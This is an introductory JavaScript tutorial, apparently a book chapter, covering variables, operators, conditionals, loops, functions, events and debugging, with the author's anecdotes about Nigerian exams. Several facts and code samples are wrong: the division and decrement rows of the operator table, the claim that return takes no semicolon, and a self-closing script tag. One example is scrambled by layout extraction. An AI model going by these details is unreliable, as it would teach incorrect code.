<title> JavaScript Sample</title> 

</head> 

 <body> 

      <script type="text/javascript"> 

      // this is a comment but some JavaScript come here 

      </script> 

</body> 

 </html> 

Using an External JavaScript 

The example above gave us a clue on how to integrate JavaScript directly into HTML, it is however 

important that we also understand how to use an external JavaScript, that is a JavaScript that is 

writing in a separate file with .js extension into our webpage. 

Firstly create a file using notepad as save it with welcome.js the file should contain the JavaScript 

below. 

 

welcome.js 

document.write( “welcome to my website”); 

Note: unlike the example earlier, where JavaScript was written directly into HTML, the External 

JavaScript code should NOT contain the <script> tag, the single line of code above is enough. 
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Then to integrate the external JavaScript file into our webpage, we simply call the script tag and 

reference the external JavaScript file, below is what it will look like. 

JStest.html 

<html> 

<head> 

<title> JavaScript Sample</title> 

</head> 

 <body> 

 <script type="text/javascript" src="welcome.js" />  

</body> 

</html> 

See the browser view 

 

Note: one of JavaScript’s major setbacks is that your browser may not support it; may execute the 

script differently, or it may be disabled on your browser, for example the script above couldn’t run 

on Mozilla browser or internet explorer but works fine on opera browser. 

Showing something on the screen 
JavaScript typically use the document.write( ) object to output or display information on a 

webpage. But before we start playing with some interesting JavaScript programs, it’s very important 

to understand that although almost all the modern web browser can understand and execute 

JavaScript it is also very important to know that some; most especially the old ones, may not support 

JavaScript, in addition to this few setback, some modern browser that however support it, may also 

have the option disable it, with this issue at the back of your mind it is therefore very important to 

follow the JavaScript standard, by placing you JavaScript content within an HTML comment tag <!-

- and the closing pair //-->, so that when you webpage is viewed on a browser that 

does not support JavaScript, instead of showing the awful  script and content to the user who may 

not understand what  

<script type="text/javascript">… means it is better that bulk of that junk remain 

hidden by the HTML comment tag. 

So this approach is use in the example below. 
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<html> 

<head> 

<title> JavaScript Sample</title> 

</head> 

 <body> 

         <script type="text/javascript"> 

     <!--              

    document.write(  Date()  ); 

     //--> 

        </script> 

</body> 

</html> 

 

The example above does something beyond HTML, the JavaScript Date() function, display on the 

webpage the day, month, year, time and other related information.  

Again JavaScript is case sensitive; this means that, for example if you have (declare) a variable called 

“name” you cannot refer to it as “Name” or “NAME”, you must call it by the small case you declared 

it with. See the code below. 

INVALID: Name variable is not declared 

<html> 

<head> 

<title> JavaScript 

Sample</title> 

</head> 

<body> 

 <script type="text/javascript"> 

 <!--       

 var name="Ben"; 

VALID: “Ben” will display 

<html> 

<head> 

<title> JavaScript Sample</title> 

</head> 

<body> 

   <script type="text/javascript"> 

 <!--       

 var name="Ben"; 
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    document.write(Name); 

 //--> 

 </script> 

</body> 

</html> 

   document.write(name); 

 //--> 

   </script> 

</body> 

</html> 

 

We will discuss more on variable later in this chapter. 

 

JavaScript is a C style of language 

It might interest you to know that JavaScript is design to use the C style of programming, C 

programming is one of the oldest and powerful programming language which has influence some 

popular modern programming languages such as C++, Java, C#, PHP and even our humble JavaScript. 

Some of the features of C style language, that characterized JavaScript is, the case sensitive 

(discussed earlier) curly bracket, loop structure and many more. 

 

Variables and Operators 
Some of the JavaScript example we have treated above does very little, but when it come to doing 

more important stuff we cannot but mention variables and operator, any one with programming 

background would not find this terms new. 

What is variable and what are they use for? 

I will like you to see variable as a container for holding information until they are needed.  

Remember in mathematics we do something like a = 1, b = 3 and c = a + b 

You can see that a, b and c are use to hold value or expression and to reference the value or 

expression when it is needed same is applicable in programming.  

 

Just like mathematics, every variable must have a name for example; a, y, country, first_name. 

However when it come to variable name some rule must be observed. 

 

A variable name must NOT start with a number. 

Bad variable name Acceptable variable name 
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1car car1 

800 score_value 

3street street3 

 

 

A variable name must NOT contain an OPERATOR.  

Operators are manful symbols use for carrying out operations.  

For the example + (plus sign), - (minus sign), = (equal sign) among other we will discuss more about 

JavaScript operators in the next chapter.   

Bad variable name Acceptable variable name 

toy-name   

(the minus ( - ) sign will cause an error) 

toy_name 

(better still use the underscore ( _ ) sign) 

 

A variable name should not contain a JavaScript keyword or function. 

Remember the Date() we use earlier to display the date and time is a typical example of a 

JavaScript keyword or function, JavaScript has many keywords we shall dabble into some more 

keyword later in this book.  

Bad variable name Acceptable variable name 

Date()   

(a JavaScript function, will cause an error) 

date 

(better still just “date” without the brackets) 

 

 

Use a meaningful variable name 

Although this naming rule will not cause error if ignore, but it is observed that a meaningful name 

will make your program to be easily understood and manage.  

In the example below using a variable name y will have an ambiguous meaning compare to variable 

name     

Poor variable name Better variable name 

y = “ben”         name = “ben” 
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value12 total 

 

Declaring or creating and using a variable 

The programming term use for creating variable is called declaring variable. So in JavaScript you 

declare a variable using the var keyword. 

For example 

var name; 

var total = 0; 

 

Note that the first variable name was declare without assigning any value to it, while the second 

variable total is declare and initialize to 0; that is was assign the value of 0 during declaration. 

The example below demonstrates another interesting may to declare multiple variables with one 

var keyword, and also go a step further to carry out some little math operation. 

<html> 

<head> 

<title> JavaScript Sample</title> 

</head> 

<body> 

         <script type="text/javascript"> 

         <!--          

  var num1, num2, ans; 

  num1 = 2; 

  num2 = 10; 

  ans = num1 * num2; 

  document.write("<b>The multiplication  is:</b> " + ans); 

  //--> 

</script> 

</body> 

</html> 

As you can see the first line declare three variables, the next two lines add values 2 and 10 to both 

variables num1 and num2 respectively, while fourth line, multiply ( * ) both variables and store it 

value to variable ans, while the last line  

document.write("<b>The multiplication is:</b> " + ans); display the result 

or value of variable ans, with the message The multiplication is: in bold (see the <B> tag), this 

message is joint  using the concatenation sign ( + ) with the variable ans. The output should be 20, 

and the screenshot should be like the one below. 
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JavaScript Operators 

In the last exercise, we make use of equal or assignment sign ( = ), addition sign ( + ) and even 

multiplication ( - ) sign, all these are known as operators. We will be discussing more JavaScript 

operators below: 

Arithmetic Operators: arithmetic operators are used to perform arithmetic between variables 

and/or values. 

Sign Meaning Example  

* Multiplication a=9*2 a=18 

+ Addition a=9+2  a=11 

- Subtraction a=9-2 a=7 

/ Division a=9+2 a=4.5 

% Modulus (division 

remainder) 

a=9%2 a= 1  

(1 means there is remainder) 

  a=10%2 a=0; 

(0 means there is no remainder) 

++ Increment b=9; 

a = ++b; 

a=10 

(b was increase by 1 before added to 

a) 

  b=9; 

a = b++; 

a=9 

 

-- Decrement b=9; 

a = --b; 

a=8 

  b=9; 

a = --b; 

a=9 
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Comparison Operators: comparison operators are used in logical statements to determine equality 

or difference between variables or values. 

 

Sign Meaning Example 

== Equal to 10 == 10 is true 

10 == 15 is false 

!= Not equal to (opposite of == ) 10 != 15 is true 

> Greater than 10 > 5 is true 

< Less than 10 < 5 is false 

>= Greater than or equal to 10 >= 15 is false 

<= Less than or equal to 10 <= 15 is true 

 

The comparison operators is often use with conditional statements to compare values and take 

action depending on the result, see the example below.  

if (scrore <= 20) { 

  document.write("Sorry you have failed this course"); 

}else{ 

document.write("Congratulations! You have passed"); 

} 

The IF …. ELSE statement is a typical example of a conditional statement, that uses a comparison 

operator <= to compare or check if the value of the variable “score” is less than or equal to 20, if the 

condition resulted to TRUE that if, IF score is LESS THAN or EQUAL to 20 then the message “Sorry 

you have failed this course” should displayed ELSE the message “Congratulations! You have passed”. 

 

Logical Operators: I love to relate logical operator to what goes on in human mind when making 

decision, as a logical being for example, should I remain in Lagos OR return to Anambra (that’s my 

state of origin). Another example is that if I could not pass the WAEC exam AND I could not get that 

job, then I should consider going to acquire more training or skill. 

Logical operators are used to determine the logic between values, expressions or variables. 
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Let’s assume that variable a=10 and b=5 then: 

Sign Meaning Description 

&& AND TRUE RESULT: both operands must be TRUE for the result can be TRUE 

Example:  

(a > 5) && (b == 5)  TRUE   :     (TRUE and  TRUE = TRUE) 

 

FALSE RESULT: If either of or both operands is FALSE then the result will be 

FALSE 

Example 

(a > 5) && (b > 5)  FALSE    :    (TRUE and    FALSE = FALSE) 

(a > 10) && (b > 5) FALSE   :    (FALSE  and  FALSE = FALSE) 

|| OR TRUE RESULT: If either or both operand are TRUE then the result will be TRUE 

Example:  

(a > 5) || (b == 5)  TRUE        (TRUE or  TRUE = TRUE) 

(a > 5) || (b > 5)  TRUE        (TRUE or  FALSE = TRUE) 

FALSE RESULT: If both operands are FALSE, then the result would be FALSE 

Example: 

(a > 10) || (b > 5) FALSE       (FALSE or FALSE = FALSE) 

! NOT 

(negation) 

NOT operator only takes one operand and negate its result 

Example: 

(a>50)  FALSE 

The example above would result to FALSE because 10, which is the value of a, 

is not greater than 50; but when we introduce the NOT or Negation operator 

the result would be changes to the opposite TRUE. Example below. 

!(a > 50) TRUE 

More example 

!(b < 7) FALSE 

!(a == b) TRUE 

 

Just like the comparison operators, the logical operator is use in conditional statements; this is 

simply because the logical operator is use along with the comparison operator to carry out more 

complex operations. See some examples below. 

var waec = “pass”; 
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var jamb = “pass”; 

If ((waec == “pass”) && (jamb == “pass”)) { 

        document.write("Congratulation, you have gained admission to 

the higher institution "); 

}else { 

       document.write("No problem! Go acquire some skills and take 

the exam next time"); 

} 

In the example above, I try to do away with the normal use of mathematics and number, because 

not all of us like this subject, but instead I use what most of us are use to, The program declare two 

variables and assign string (a text) “pass”, not number now!. And    compare them using == (equal or 

same as) operator to check is their value is “pass” if both operand a TRUE, as a result of the AND && 

operator then the message ("Congratulation, you have gained admission to the higher institution " 

will be displayed on the screen, else the message ("No problem! Go acquire some skills and take the 

exam next time" will be displayed on the screen. 

 

Sometime we programmer adopt a style and examples that has to do with our personal experience 

or what we see around us. That’s why I consider programming more as an art than science, (this 

must have been because I had the opportunity to be in both field) 

The sample program about WAEC, JAMB, admission and skill is from my personal experience. I had 

to write WAEC three times before passing it and JAMB once; this is the hurdle that any one aspiring 

to go into University, polytechnic or colleges in Nigeria must go through, while doing this I made a 

decision earlier to acquire a computer skill, while I go through the process; so that I don’t get too 

frustrated by the exam experience and at the same pursue my dream, is been more than 10 years 

and it all feels good! 

 

Decision Statements 
Quite often in life we tend to make decision due the condition we found ourselves, for example I get 

easily agitated when I see blood or open wound, even the sight or smell of drugs or hospital irritate 

me, maybe this is one of the reasons why I hardly fell ill or may be because my genotype is AA, since 

I understood this I there not thinks of making a career in medicine or any of such related field.  

Same can be said about programming, as you see in the previous examples, programming allow you 

to perform or make different decision based on one or more conditions. 

You use the If… Else statement to make decision I JavaScript or similar languages, see syntax below: 
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If… Else  

First let’s take a look at the If… statement, this statement is use to execute some code only if a 

specified condition is true. 

Syntax 

if (condition) 

   { 

   code to be executed if condition is true 

   } 

Below is an example that make use of the If… statement. 

<script type="text/javascript"> 

var age = 15; 

if (age < 18) { 

   

   document.write("<b>Sorry:</b> you are not eligible to register"); 

} 

</script> 

The example above could have been more interesting If we ask the user to enter their age via form, 

but we have hand-coded the age to 15, so that we don’t get things too complicated at this state; but 

later in this book we will learn how to retrieve or process form.  

Our main point in the example above is the if… statement, as you can see the condition check to see 

if the value in the variable age is less than 18, and in this case the condition is  TRUE and the 

message contained in document.write() is displayed on the screen, notice if you initialize or change 

the value of the variable to 20  var age = 20, you will not to see anything on the screen, which is not 

so logical. Therefore to handle this unexpected or FLASE condition we will need to extent the if 

statement to If… else 

We use the If… else together to execute a code if the condition is TRUE or FALSE. 

Syntax  

if (condition) 

 { 

     code to be executed if condition is true 

 } 

 else 

 { 

     code to be executed if condition false 

 } 

Below is a modified version of our last program, using the If…Else statement. 

<script type="text/javascript"> 

var age = 20; 
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if (age < 18) 

{ 

   document.write("<b>Sorry:</b> you are not eligible to register"); 

}else{ 

   document.write("<b>Welcome:</b> to our program."); 

} 

</script> 

With the Else… statement present in our program now, if you run or test this code, the else block will 

be executed because the variable age value is 20 which is not less than 18. 

 

Multiple If… else statements or Switch statement 

It is a common phenomenon in our higher institution whenever we are learning about the multiple 

if...else statement or switch statement we often write this simple program to compute our CGPA. 

Either we are writing a CGPA grade program or a Salary grade program, either multiple if… else or 

switch statement can be use (both does the same thing, except that the switch is said to be more 

effective and involve less code, but personally I don’t prefer it, neither do I use it much in my 

programs, I often settle for the multiple if…else instead.) 

Before we start getting dirty with code, let’s relate this statements with a real life experience. You 

know our life can be very multi-tasking (another computer term that involves doing more than one 

thing at a time, although we don’t really multi-task but we are often face with challenges) For 

example you have 10,000 naira, and want to buy a book for that professional exam if the same may 

guarantee your promotion in the nearest future, or use the money to develop and host that 

informative website if that your job give’s no room for promotion or use that money to buy that new 

smart phone because you think you don’t have the time and resources to manage that informative 

website and the list goes on. 

As you can see from the illustration above that everything revolves around making decision based on 

multiple conditions to arrive at just one result or outcome. 

This is what multiple if...else statement or switch statement is use for, to select one of many blocks 

of code to be executed. 

 

Let’s take a look at multiple if...else statement first. 

Syntax 

 

if (condition1) 

{ 

      code to be executed if condition1 is true 

} 

else if (condition2) 
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{ 

      code to be executed if condition2 is true 

} 

 else if (condition3) 

 { 

      code to be executed if condition3 is true 

} 

else 

{ 

      code to be executed if either of the three conditions is true 

} 

Now we are going to look at a practical application of this statement using a salary grading program 

but before we do, I will like to introduction us to form handling using JavaScript so that we can take 

this example (salary grading program) by asking our user to enter the level of the staff before we can 

do the processing.  

 

Tip on JavaScript debugging 

While running most of the JavaScript samples in this book I notice that debugging in JavaScript 

remains a challenge, personally I think Internet explorer web browser does this better and support 

JavaScript better than other browsers. By default Internet explorer reports error and makes 

debugging fairly easy without additional ads-on or tools 

For example I omitted the closing bracket in this line of code document.write("Hello Ben”; instead of 

document.write("Hello Ben”); on like other browser internet explorer shows an empty screen, but 

also show an error notice at the status bar. See the screenshot below.  

 

I double click this 

“Error notification” 

icon (close to 

Done) and I get a 

dialogue box, 

shown below. 
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Then I click the 

“Show detail” 

button, (if not 

already clicked) 

to see the error 

detail as shown 

in the screenshot 

below.  

 

 

 

 

 

Form Handling in JavaScript 
The example below shows how to retrieve value entered into the text field and display it using 

JavaScript.     

<HTML> 

<HEAD> 

<TITLE> JavaScript Sample </TITLE> 

 

<script type="text/javascript"> 

function ShowValue(){ 

 var txtName = document.theform.YourName.value; 

 if(txtName !== ""){ 

  alert("Your name is " + txtName); 

 }else{ 

  alert("Please enter your name"); 
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 } 

} 

</script> 

</HEAD> 

<BODY> 

<FORM NAME="theform" METHOD="POST" onSubmit="ShowValue()"> 

Enter your name: <INPUT TYPE="TEXT" NAME="YourName"> 

<BR> 

<input type="submit" value="Submit Form" /> 

</FORM> 

</BODY> 

</HTML> 

The code above, as usual contains a JavaScript (at the top) and HTML (follows), this HTML need some 

explanation (for the words I bolded, because it is use to interact with the JavaScript), first the form is 

name theform, with one text field name “YourName”  

 

When the form is submitted, it calls a JavaScript function, see onSubmit="ShowValue() 

The JavaScript section, is basically consist of a function ShowValue()  

function ShowValue(){ 

 var txtName = document.theform.YourName.value; 

    if(txtName !== ""){ 

  alert("Your name is " + txtName); 

     }else{ 

  alert("Please enter your name"); 

    } 

} 

This is the function that the HTML form called when submitted onSubmit="ShowValue()"  

After the function definition code then follows the line where I created a variable txtName and 

assign the value of the text field to, the screenshot below shows how this value is collected.  
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With this line of code we are able to collect whatever you type into the text field to the variable 

txtName, the next line of code if(txtName !== "") check if the value in txtName IS NOT 

EQUAL TO !==  empty “” if the condition is TRUE (that is a name is entered) the message in the first 

alert() box will show alert("Your name is " + txtName); see the screens  

 

If you did not enter any name and click the submit 

button you will get the message in the else block  

alert("Please enter your name"); as shown at the right 

 

Now we can proceed with our salary grading program, unlike the last program, this program uses 

multiple if…else, to report the level and earning of each category of staff, below is the code. 

 

 

grade.html 

<HTML> 

<HEAD> 

<TITLE>Salary Grade Program </TITLE> 

 

<script type="text/javascript"> 

function Grade(){ 

 var staff_level = document.theform.txtGrade.value 

 if (staff_level =="1"){ 

    staff_detail  = "Top management staff, earn =N= 50,000"; 
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 }else if (staff_level =="2"){ 

    staff_detail  = "Middle management staff, earn =N= 30,000"; 

 }else if (staff_level =="3"){ 

    staff_detail  = "Low management staff, earn =N= 10,000"; 

 }else { 

     staff_detail  = "Sorry invalid selection"; 

 } 

      //Display the result of the grade  

 alert(staff_detail); 

} 

</script> 

</HEAD> 

<BODY> 

<FORM NAME="theform" METHOD="POST" onSubmit="Grade()"> 

Enter the level of the staff (1 to 3):  

<INPUT TYPE="TEXT" NAME="txtGrade"> 

<BR> 

<input type="submit" value="Submit Form" /> 

</FORM> 

</BODY> 

</HTML> 

The HTML selection of the grade program, just like the last program, ask user to enter   the level of 

the staff (1, 2 or 3), see the screenshot below. 

 

 

Similarly, when submitted this form call the JavaScript function Grade() through it onSubmit 

event, and as usual  this trigger the JavaScript section to execute the program in the grade function 

function Grade(){ below is what happens in the remaining lines of code. 

First we collect whatever that is enter and assign it to a variable  

var staff_level = document.theform.txtGrade.value 

Then we compare if value in the variable is equal == to 1  

if (staff_level =="1"){ 

 

if this condition is true, then the line of code below will execute  

staff_detail  = "Top management staff, earn =N= 50,000"; 
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That is the text or string Top management staff, earn =N= 50,000 is stored or assign to 

staff_detail  variable.  

 

Or if 2 entered, then next else if block below will execute 

else if (staff_level =="2"){ 

    staff_detail  = "Middle management staff, earn =N= 30,000"; 

} 

 

And if it is 3 that is entered… 

else if (staff_level =="3"){ 

    staff_detail  = "Low management staff, earn =N= 10,000"; 

 } 

What if I did not enter anything or any jargon is entered, then the last else block will execute 

else { 

     staff_detail  = "Sorry invalid selection"; 

 } 

 

Regardless of the option that a user chose, the last line of code alert(staff_detail);  will 

display using alert, whatever there is in the variable staff_detail which must be either of the 

four(4) message resulted in the conditional statements.  

 

See the screenshot that follows to see what this looks like. 

When 1 is entered and submitted 

 

 

 

When 2 is entered and submitted 
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When 3 is entered and submitted 

 

When 1, 2 or 3 is not enter 

 

 

 

Looping  
It’s is not unusual that you have to try more than once in life to achieve your goals; same is 

applicable to programming  

Loop simply mean round, circle or repeat. Loop execute a block of code for a specified number of 

times, or while a specified condition is true. JavaScript just like other similar C-styled language has 

two major types of loops. 

 

For Loop: loop through a block of code for a specific number of times; this means that you are 

expected to know and specify the number of times the loop will run; the programming term for this 

is iteration. Below is the syntax for for…Loop. 
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Syntax 

for (variable=start; variable<=end; variable=variable+increment){ 

     Block of code to be executed 

} 

For example loop may save you a lot of headache if you have to generate or perform an operation 

involving large number; thousands or millions. 

Let’s see some examples. 

<html> 

<head> 

<title> JavaScript For Loop</title> 

</head> 

<body> 

<script type="text/javascript"> 

 var n; 

 for (n=1;n<=10;n++)  { 

             document.write("Number " + n + "<br />"); 

 } 

 </script> 

 </body> 

 </html> 

The example above simply generates 10 numbers, see screenshot below. 

 

 

 

 

while loop: just like the for…next; while…loop is use to loop through a block of code while a 

specified condition is true.  
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syntax 

while (condition) 

{ 

  code to be executed; 

} 

Below is the while…loop equivalent of the for…next. 

<html> 

<head> 

<title> JavaScript While…Loop</title> 

</head> 

<body> 

<script type="text/javascript"> 

var n=0; //declare the counter 

while (n<=10)   { 

      document.write("Number: " + n); 

      document.write("<br />"); 

      n++; 

} 

</script> 

</body> 

</html> 

Note that the increment operator ++ it simply increase n by 1 each time the program loop. We can 

also write that line as n=n+1, which actually give us the opportunity to rewrite the program to 

generate only even number.  See the code segment below. 

Generate even number from 0 to 20 

<script type="text/javascript"> 

var n=2; //declare counter to start from 2 

while (n<=20) 

{ 

   document.write(n +"<br />");  

   n = n + 2; 

} 

</script> 

If you look at the program segment above you we notice very little 

difference from the previous one. First is start by declaring the 

counter to start from two var n=2, secondly; it increment by two 

n=n+2.  
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And the next example produces a 2 multiplication table. 

<script type="text/javascript"> 

var n=1; 

while (n<=20){ 

 document.write(n  + " X 2=" + n * 2 +"<br 

/>"); 

 n++; 

} 

</script> 

Note: I bolded the code that changes:   

n increase, for example 1,2,3,4,5…20  

And n*2 multiply the incremented n by 2, using the multiply 

operator (*).  This results to 1*2, 2*2, 3*2, 4*2, 5*2….20*2 (this is 

the arithmetic expression that produce the 2,4,6,8,10,12…40) 

Other are just a text join (using the + sign) to the variable and 

expression, this are + " X 2=" + and +"<br />" 

 

 

 You can try to generate odd numbers from 1 to 30; that is 1, 3, 5….29 

 Write a program to produces a 5 multiplication table 

 You could also try your hand on any similar program using loop. 

Functions 
As you know in life our task, duty or dream can be very big and but when you pick that pen and 

paper; and break big dream into smaller plans that you can achieve almost on a daily basis you might 

be surprise how far you could go even in a couple of weeks, months or years.  

This approach actually make our life easier and that is why it is also applicable in JavaScript and it is 

called function, while some modern languages such as Java and C# just to mentions view, also 

encourage programmers to develop programs in smaller and manageable modules or piece, this is 

why they are regarded as Object Oriented Programming language OOP. 

In JavaScript a function is a collection of statements or program that performs a given or limited 

task, hence you can write several functions to carry out differed task.  

In JavaScript a function is executed by an event or by a call to the function while you can place or 

define your functions in any area of your HTML page it is however encouraged to put functions in 

the <head> section or better still in an external JavaScript file with .js extension.  

NOTE: JavaScript also have its predefined or built-in function. That is the functions that came with 

the language that you can consume or use without defining it yourself such as document.write(), 

alert() and many more, you can remember we have been using document.write() in previous 

examples and we will use more in the examples to come. 
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Defining a Function 

Below is the syntax for defining a function. 

Syntax 

function FunctionName (par1,par2,...,parN) {  

    statements; 

return 

} 

The function statement defines a new function with the name you specify followed by parentheses 

that may contain the parameters (par1, par2 and parN) which the function use to collect values 

passed to the function then come the curly braces {} which contains all function statements. 

Functions can also end with an optional return statement, which allows optional value to be 

returned to the statement that called the function. 

Please note that the return does not end with the usual termination semi-colon (;). 

Now let’s a simple example of a function names displayhello() with no parameter(s) 

remember parameters are optional, so this function welcome the user with an Hello message 

making use of a build-in function alert(). 

<html> 

<head> 

<title>JavaScript Function</title> 

<SCRIPT LANGUAGE="JavaScript" type="text/javascript"> 

 function displayhello() 

 { 

      alert("HELLO and welcome!"); 

 } 

 </script> 

</head> 

<body onLoad="displayhello()"> 

Refresh page and be welcome again.   

</body> 

</html> 
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So the message “HELLO and welcome!” is displayed with an alert box immediately the page is 

loaded, thanks to the onLoad event that call the function <body 

onLoad="displayhello()">. Remember I said earlier that functions are called by event so 

onLoad is just one of the events in JavaScript as we have several others one we will still touch in 

our examples to come. 

Also note that the function definition does not have the “return” line since any values is expected 

returned by the function.  

Now we are going to show you a modify version of the last example that will request for your name 

and when you click submit button the value you supply will be passed to the function, sure this 

example will contain a parameter statement since data input is involve. 

<html> 

<head> 

<title> javascript Function </title> 

 

<script language="javascript" type="text/javascript"> 

 function displayhello(yourName) 

 {    

  alert("HELLO and welcome! " + yourName); 

 } 

</script> 

</head> 

<body> 

<script language="javascript" type="text/javascript"> 

var name; 

name = prompt("Enter your name: ");   

displayhello(name);  

</script> 

</body> 

</html>  

I test this on opera web browser, here is what I get:  First, I was prompt to enter my name, which I 
did and click the “OK” button… 
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Then I got this second Hello message welcoming me 

 

If you notice the difference between this example and the last one is that the function definition 

contains one parameter “yourName” while <body> section contains JavaScript where we make use 

of another built-in function prompt() which actually help us to collect the value from the user and 

assign it to the variable “name” and the next line displayhello(name); was the line that called the 

function and supply it parameter or argument as expected.  This example did not make any use of 

event neither does it contain a return statement. 

This next example makes a use of the return statement. It prompt user to supply two values and it 

return the result of their sum. 

<html> 

<head> 

<title>Function Test 1.3</title> 

 

<script language="javascript" type="text/javascript"> 

function add () 

{ 

var ans; 

var a; 

var b; 
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a = prompt("Enter A"); 

b = prompt("Enter B"); 

// parseInt convert the value to Integer i.e whole number 

ans = parseInt(a) + parseInt(b); 

return ans; 

} 

 </script> 

 

</head> 

<body>  

 

<script language="javascript" type="text/javascript">   

   document.write("The addition is " + add ()); 

</script> 

 

</body> 

</html> 

When I test this program in Opera, I was prompt for the first number; I entered 40 and click the OK 

button… 

 

…. This is followed by the second prompt 
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After entering the second number, that is 10 and clicking Ok, I got the result below. 

 

 

The newly introduce flavour to this JavaScript program, apart from the return statement is the 

parseInt() which is very important because it help us to convert the variables to integer or 

whole number. For example if you test the program above, entering 5 and 3 respectively without the 

parseInt() you will be amaze at the result you will get which is 53 instead of 8, this is because 

variable value are string by default so without  parseInt()  both values will be joined or 

concatenate  as a + b, that is “5” and “3” remember the plus sign (+) is also use for concatenation.  

But with the help of the parseInt() parseInt(a) + parseInt(b) the result will be the actual 

sum which is 8.  

 

Very Important: you must write the parseInt with the “I” capitalize else it won’t work, so this 

parseint() is wrong, while this parseInt() is correct. 

 

 

Events 
The events of life is similar that of JavaScript; because events are actions or things that happens and 

we can respond to them. So in JavaScript when our web page loads we can say that an event Load 

has occur, when we click a button or link a Click event will be thrown and we submit a form it 

triggered the Submit event. 

Just like you can choose to or not to respond to an events of real life, you can also choose to or not 

to respond to events in JavaScript. So to response to an event in JavaScript you most sacrifice to 

write the event handler for that particular event.  

Like in one of the examples we had, we responded to a windows or page load event using the even 

handler Onload. Below is a table containing some common events and their respective event 

handlers in JavaScript. 

Event Description Possible elements 

that make them to 

Event Handler 
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occur 

Blur Occurs when you clicks 

outside a field 

Select   

Text,  

Text area   

OnBlur 

Focus Occurs when you click inside 

or on the field 

Select list,  

Text,  

Text area   

OnFocus 

Change Occurs when you change the 

value in a form field 

Select list,  

Text,  

Text area   

OnChange 

Select Occurs when you select  a 

form element’s field 

Text,  

Text area   

OnSelect 

MouseOver Occurs when you move your 

mouse over a link. 

Hyperlink or Link OnMouseOver 

MouseOut Occurs when you move your 

mouse aware from over a link 

after which you have move 

your mouse over it. 

Hyperlink or Link OnMouseOut 

Click Occurs when you click a link 

or form element. 

Submit or Botton 

element 

Checkbox 

Radio button 

Hyperlink or Link 

OnClick 

Load Occurs when a web page is 

loaded by your web browser. 

Windows or Web 

page 

OnLoad 

Unload Occurs when you leaves a 

web page. 

Windows or Web 

page 

OnUnload 

Submit Occurs when you click the 

submit button of your form 

element. 

Form OnSubmit 

 

The table above gives you an overview of how event works in JavaScript. We will be looking at some 

examples of events. 

  

OnLoad and OnUnload 

This example uses Load and Unload event to welcome visitors immediately they visit or load the 

webpage and also greet them “Goodbye!” when they close the browser. 

<html> 

<head> 

<title>JavaScript Event</title> 

</head> 
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<body onLoad="alert('Welcome to my website')" 

onUnload="window.alert('Goodbye!')">  

Testing Load and Unload events. 

</body> 

</html> 

When I am tested this example on opera the load work just fine but unload greeting did not come up 

but both work fine on internet explorer, this is just to tell you that browsers behavior differently 

when execution JavaScript. 

  

 MouseOver and  MouseOut Event 

As explained in the table earlier,  MouseOver event occurs when you move your mouse pointer over 

a link. 

<html> 

<head> 

<title>MouseOver and MouseOut Event</title> 

</head> 

<body> 

<a href="test.html"  

onMouseOver='document.bgColor="#99FFCC"';  

onMouseOut='document.bgColor="yellow"'; 

> 

Change the colour of my page background. 

</a> 

</body> 

</html> 

The result: immediately you move your mouse over the link, the webpage background turns sky blue 

and when you move your mouse away it turn yellow.  
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Click Event 

Click event occurs when you click a link or form element most especially button, If you observe our 

previous event example, The event is written inside the HTML element that make use of them; 

unlike the former, this event example actually called a function which does the task of displaying the 

date and time, remember this date and time is gotten from your operation system time, so incase if 

it is not correct then you should set your system date and time. 

<html> 

<head> 

<title>Click Event</title> 

<script language="javascript" type="text/javascript"> 

function displayTime(){ 

      alert(Date()); 

} 

</script> 

</head> 

<body> 

 <button type="button" onclick="displayTime()">What is the Date and 

Time</button> 

</body> 

</html> 
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The unusual line in this program Date() is a built-in function that create the date and time while 

the alert() display it, later in this book we will look at more interesting built-in functions. 

 

Handling error 
Error is an inevitable occurrence in programming, its even part of the learning curves because it is 

important to be able to understand and isolate error or bugs.  Regardless of my years of experience 

as a programmer I still make some plunders, but this never bothers me I just spent time to correct it 

and learn from it, beside there is a wise saying that says “he who makes no mistake does nothing”. 

In programming there two major types of error, logical and syntax error. 

 

Logical error: These are error that occurs when you make a mistake in the construction or your logic, 

it is the most difficult error to dictate or debug because your program will actually run or execute 

successfully but you are not getting the expected result and this can be frustrating. 

Let me demonstrate an example of a logic error. Assuming we want to write a program to generate 

odd numbers from 1 to 20. And we write the program like the one below. 

<html> 

<head> 

</head> 

<TITLE>Logical Error</TITLE> 

<body> 

<p>Odd Number from 1 to 20</p> 

<p> 

<script type="text/javascript"> 

var n=0; 

while (n<=20){ 

   document.write("Number: " + n); 

   document.write("<br />"); 

   n = n + 2; 

} 

</script> 

</p> 

</body> 

</html> 

The Result 

 

By the time you test it you should be seeing a contrary result as shown in the right, instead of odd 

numbers it generated even number instead, this is a typical example of a Logical error, as you can 

see, the script executed successfully but not the result we expected because the problem is in the 

logic of our script. 

When a logical error occurs you require you have to put on your logical hat to track and fix it, the 

programming term for this is debugging.  
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So to do this we have to take a look at only the script segment line by line, even though it looks 

normal but the logic error is right there in the initialization of the variable. var n=0; because this 

mean the number generation will begins from 0 then 2, 4, 6…. So the solution is to initialization the 

variable to start from 1 var n=1; instead of 0; that is all. Below is the result. 

 

<script type="text/javascript"> 

var n=1; 

while (n<=20){ 

   document.write("Number: " + n); 

   document.write("<br />"); 

   n = n + 2; 

} 

</script> 

 

Another common logic error that beginners face is confusing comparison operator == with 

assignment operator =, although some programming languages such as BASIC and Visual BASIC uses 

the sign “=” from both comparison and assignment but C-styled language such as JavaScript, C++, 

PHP and Java don’t. 

Below is an example which demonstrates this. 

<html> 

<head> 

</head> 

<title>Logical Error</title> 

<body> 

<script type="text/javascript"> 

var jamb = "pass"; 

if (jamb = "fail") { 

        document.write("Sorry, try again next year"); 

}else{ 

       document.write("Congratulation, you have gained admission to 

higher institution"); 

} 

 </script> 

</p> 

</body> 

</html> 
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In sample script above we initialized the variable jamb to pass var jamb = "pass" while the next line is 

suppose to check (compare) if the value in “jamb” is fail if (jamb = "fail") then the message "Sorry, 

try again next year" should be displayed, else the congratulatory message should appear, logically 

we would expect the congratulatory message in the else statement to display since we’ve initialized 

jamb to pass var jamb = "pass" but unfortunately we will get 

 

This is as a result of using assignment operation “=” to construct our condition statement  

if (jamb = "fail") instead of the right comparison operation “==” this is what the correct script should 

actually look like. 

<script type="text/javascript"> 

var jamb = "pass"; 

if (jamb == "fail") {     

     document.write("Sorry, try again next year"); 

}else{ 

     document.write("Congratulation, you have gained admission to 

higher   institution"); 

} 

</script> 

 

 

In the previous example, what happen is that it assigned “fail” to the jamb variable jamb = "fail" 

instead comparing it jamb == "fail", so no matter what happen the IF statement will result to TRUE. 

